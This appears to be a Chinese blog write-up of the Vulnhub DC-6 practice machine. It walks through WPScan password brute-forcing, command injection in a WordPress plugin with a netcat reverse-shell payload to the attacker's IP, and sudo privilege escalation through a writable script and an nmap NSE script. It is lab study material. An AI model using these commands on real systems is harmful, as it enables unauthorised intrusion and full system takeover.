[Vulnhub] DC-6靶机渗透

0x00 环境搭建

靶机地址:http://www.vulnhub.com/entry/dc-6,315/
下载之后用vmware打开即可,使用桥接模式。
开机后搭建完成:
在这里插入图片描述
本关只有一个flag,且需要修改hosts文件访问:192.168.1.147 wordy


0x01 主机端口探测

arp-scan -l探测内网存活主机,再用nmap -sV -p- ip来探测端口:
在这里插入图片描述
发现开启了80端口(HTTP服务)和22端口(SSH服务)


0x02 web渗透

访问80端口,发现又是WordPress:
在这里插入图片描述扫了一下只发现了一些目录遍历漏洞,没什么利用价值。

直接用WPScan枚举用户:wpscan --url http://wordy/ --enumerate u
在这里插入图片描述
暴破密码:wpscan --url http://wordy -e u --passwords /usr/share/wordlists/rockyou.txt
在这里插入图片描述
登录后台发现插件Activity monitor
在这里插入图片描述查找相关漏洞:
在这里插入图片描述查看利用方式:
在这里插入图片描述访问漏洞页面,输入ip点击抓包:
在这里插入图片描述
写入payload:baidu.com| nc -e /bin/bash 192.168.1.143 4444
在这里插入图片描述攻击机监听,得到反弹shell:
在这里插入图片描述
获取交互式shell:python -c 'import pty;pty.spawn("/bin/bash")'

在 jens 家目录下发现一个可执行脚本,但没有权限:
在这里插入图片描述
在 mark 的家目录下发现提示 garham用户密码:
在这里插入图片描述


0x03 SSH远程连接

ssh 登录 graham用户:
在这里插入图片描述
使用sudo -l,发现可以以 jens 用户免密执行backup.sh脚本:
在这里插入图片描述
可以让 jens 执行/bin/bash就直接得到了 jens 的 shell:

echo "/bin/bash" > backups.sh
sudo -u jens ./backups.sh

在这里插入图片描述


0x04 nmap提权

nmap有执行脚本的功能,通过编写特殊脚本,可以实现利用nmap提权(sudo提权)

sudo -l查看当前用户可以以 root 身份免密执行 nmap 命令:
在这里插入图片描述
写入一个执行bashnmap脚本,运行

echo "os.execute('/bin/bash')" > /tmp/root.nse
sudo nmap --script=/tmp/root.nse

找到最终flag(这里输入的命令看不到):
在这里插入图片描述


总结

整体流程如下:
主机发现 => 端口扫描 => 访问web服务 => 暴破登录 => 利用已知漏洞RCE => nc反弹shell => 切换用户 => nmap提权 => 找到最终flag

学习了 sudo 提权,当前用户能以其他用户身份免密执行脚本时,将/bin/bash写入脚本中,令其执行,就可以获得过该用户的权限。


参考链接:
https://www.cnblogs.com/bingtang123/p/12838419.html(VulnHub::DC-6)

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值